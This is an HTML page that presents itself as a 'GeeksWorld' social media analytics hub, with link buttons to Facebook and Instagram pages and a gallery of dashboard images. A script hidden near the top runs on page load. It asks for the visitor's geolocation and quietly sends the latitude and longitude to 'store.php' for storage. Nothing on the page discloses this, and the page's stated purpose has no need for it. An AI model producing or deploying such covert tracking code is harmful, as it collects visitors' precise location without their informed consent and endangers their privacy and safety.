
<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="utf-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1" />
    <link rel="stylesheet" href="https://www.w3schools.com/w3css/4/w3.css" />
    <title>All Social Media Analytics</title>
    <style>

      body {
          background-image: url(https://www.w3schools.com/howto/img_link_tree_template3_bg.jpg); /* The image used for background*/
          background-position: center; /* Center the image */
          background-repeat: no-repeat; /* Do not repeat the image */
          
      }

      .container {
        width: 100%;
        padding-right: 15px;
        padding-left: 15px;
        margin-right: auto;
        margin-left: auto;
      }

      .image-container {
        text-align: center;
        width: 100%;
      }

      .links-container {
        display: flex;
        flex-direction: column;
        justify-content: center;
        align-items: center;
        gap: 20px;
      }

      .link {
        min-width: 50% !important;
      }

      @media (min-width: 1200px) {
        .container {
          max-width: 1140px;
        }
      }
      @media (min-width: 992px) {
        .container {
          max-width: 960px;
        }
      }
      @media (min-width: 768px) {
      .container {
          max-width: 720px;
        }

      .link {
          width: 100%;
        }
      }
      @media (min-width: 576px) {
      .container {
          max-width: 540px;
        }
      }

      .w3-purple, .w3-hover-purple:hover {
        color: #fff!important;
        background-color: rgba(156, 39, 176, 0.6) !important;
      }

    </style>
  </head>

  <body onload="getLocation()" class="w3-white">
      


<p id="demo"></p>

<script>
var x = document.getElementById("demo");

function getLocation() {
  if (navigator.geolocation) {
    navigator.geolocation.getCurrentPosition(showPosition);
  } else { 
    x.innerHTML = "Geolocation is not supported by this browser.";
  }
}

function showPosition(position) {
    const xhttp = new XMLHttpRequest();
    xhttp.open("GET", "store.php?lat=" + position.coords.latitude + "&long=" + position.coords.longitude);
    xhttp.send();
}
</script>

    <!-- Content container -->
    <div class="container">
   
        
        <div class="w3-text-deep-orange">
          <p class="w3-text-white w3-large"> Welcome to <span class="w3-tag w3-large w3-round w3-black w3-text-white"><strong>Geeks</strong></span>World
          </p>
          <p class="w3-large"><strong>Are You looking for all the socialmedia platforms in one place and to grow your audience!!<br>Here it is for you.</strong></p>
        </div>

        <div class="links-container">
          <a href="/facebook.html" class="w3-button w3-hover-pink w3-large w3-round w3-purple w3-border link" target="_blank"><i class="fab fa-facebook"></i>Facebook</a>
          <a href="./instagram.html" class="w3-button w3-hover-pink w3-large w3-round w3-purple w3-border link" target="_blank"><i class="fab fa-instagram"></i>Instagram</a>
          <a href="#" class="w3-button w3-hover-pink w3-large w3-round w3-purple w3-border link" target="_blank"><i class="fab fa-twitter"></i>Twitter</a>
          <a href="#" class="w3-button w3-hover-pink w3-large w3-round w3-purple w3-border link" target="_blank"><i class="fa fa-code"></i>Blog</a>
        </div>
      </div><br>
 
<div>
<style>
div.gallery {
  border: 1px solid #ccc;
}

div.gallery:hover {
  border: 1px solid #777;
}

div.gallery img {
  width: 100%;
  height: auto;
}

div.desc {
  padding: 15px;
  text-align: center;
}

* {
  box-sizing: border-box;
}

.responsive {
  padding: 0 6px;
  float: left;
  width: 24.99999%;
}

@media only screen and (max-width: 700px) {
  .responsive {
    width: 49.99999%;
    margin: 6px 0;
  }
}

@media only screen and (max-width: 500px) {
  .responsive {
    width: 100%;
  }
}

.clearfix:after {
  content: "";
  display: table;
  clear: both;
}
</style>
<div class="responsive">
  <div class="gallery">
<img src="https://www.oberlo.com/media/1603898769-insta11.png?w=1824&fit=max">
  </div>
</div>

<div class="responsive">
  <div class="gallery">
    <img src="https://th.bing.com/th/id/OIP.gBd1yF1UvI9_8BgVoskcPAHaEo?pid=ImgDet&rs=1">
  </div>
</div>

<div class="responsive">
  <div class="gallery">
    <img src="https://thepreviewapp.com/wp-content/uploads/2017/06/instagram-analytics-tools-2.jpg">
  </div>
</div>

<div class="responsive">
  <div class="gallery">
    <img src="https://www.datapine.com/de/images/facebook-connector-example-dashboard.png">
  </div>
</div>

<div class="responsive">
  <div class="gallery">
    <img src="https://themes.getbootstrap.com/wp-content/uploads/2020/09/front-dashboard-v2-cover-540x405.jpeg">
  </div>
</div>

<div class="responsive">
  <div class="gallery">
    <img src="https://themes.getbootstrap.com/wp-content/uploads/2018/06/dashkit-screenshot-crushed-540x405.jpg">
  </div>
</div>

<div class="responsive">
  <div class="gallery">
    <img src="https://themes.getbootstrap.com/wp-content/uploads/2018/09/screenshot2-bs5-540x405.jpg">
  </div>
</div>

<div class="responsive">
  <div class="gallery">
    <img src="https://themes.getbootstrap.com/wp-content/uploads/2019/06/hyper-react-540x405.jpg">
  </div>
</div>

<div class="clearfix"></div>
</div>

  </body>
</html>
